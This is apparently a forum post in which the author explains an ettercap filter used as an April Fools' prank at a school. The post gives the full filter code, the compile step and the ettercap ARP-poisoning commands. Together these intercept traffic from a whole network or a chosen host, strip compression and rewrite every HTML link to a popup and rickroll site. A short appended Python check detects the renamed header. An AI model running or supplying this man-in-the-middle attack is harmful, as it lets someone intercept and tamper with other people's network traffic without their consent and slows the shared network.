Below is a simple ettercap filter that I used to pull off a rather funny April Fools' joke at my school. Basically, the filter intercepts all "a href=" HTML links and replaces them with the string I specified, www internetisseriousbusiness org. (Warning: don't visit that link unless you like annoying popups and rickrolls.)
The code for the filter:
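# Requests to port 80: rename the Accept-Encoding header so the server
# replies with uncompressed HTML that the second rule can match.
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
# Responses from port 80: rewrite link targets.
# Quotes inside a filter string must be escaped with a backslash.
if (ip.proto == TCP && tcp.src == 80) {
   replace("<a href=", "<a href=\"internetisseriousbusiness.org\" ");
   replace("<A HREF=", "<a href=\"internetisseriousbusiness.org\" ");
   msg("Filter Ran.\n");
}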
To actually use this, you will need to convert the code to a usable format.
Save the above code as "seriousbusiness.filter" and then run:
> etterfilter seriousbusiness.filter -o seriousbusiness.ef
Once you have the compiled .ef filter, you can run the filtering process on an entire network using:
> ettercap -T -q -F seriousbusiness.ef -M ARP // //
On large networks this can take a long time to run and can really slow the network down, since all traffic is technically being routed through your computer.
You can target a specific host instead of the entire network by using:
> ettercap -T -q -F seriousbusiness.ef -M ARP /10.22.1.198/ //
Once you have the filter running, just sit back and wait. Your target(s) will visit their routine websites like normal, but when they go to click a link...you get the idea.
Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
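The first rule of the filter renames the request's Accept-Encoding header to a string of the same length, which leaves a coding list such as "gzip, deflate" sitting under an unknown header name. As an added example (not part of the original post), this Python check flags that pattern in requests seen at a server or proxy; the sample requests and the host example.test are constructed.

```python
import re

ORIGINAL = "Accept-Encoding"
# Content-coding tokens, optionally with a q-value (gzip;q=0.8).
CODING = re.compile(r"^(gzip|deflate|br|zstd|compress|identity)(;q=[0-9.]+)?$", re.I)
# Standard 15-character header whose value "br" (Breton) would collide.
IGNORE = {"accept-language"}

# Constructed sample requests (not captured traffic).
CLEAN = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
         b"Accept-Encoding: gzip, deflate\r\n\r\n")
TAMPERED = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
            b"Accept-Rubbish!: gzip, deflate\r\n\r\n")


def parse_headers(raw):
    """Return (name, value) pairs from a raw HTTP/1.x request head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    pairs = []
    for line in head.split("\r\n")[1:]:        # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def looks_like_codings(value):
    """True when every comma-separated token is a content-coding."""
    tokens = [t.replace(" ", "") for t in value.split(",") if t.strip()]
    return bool(tokens) and all(CODING.match(t) for t in tokens)


def renamed_accept_encoding(raw):
    """Names of same-length headers carrying a coding list while the
    real Accept-Encoding header is absent from the request."""
    headers = parse_headers(raw)
    if any(n.lower() == ORIGINAL.lower() for n, _ in headers):
        return []                               # genuine header present
    return [n for n, v in headers
            if len(n) == len(ORIGINAL)
            and n.lower() not in IGNORE
            and looks_like_codings(v)]


if __name__ == "__main__":
    for label, req in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, renamed_accept_encoding(req))
```

The rewrite only works on plaintext HTTP to and from port 80, so serving the site over HTTPS removes the filter's ability to match either the header or the links.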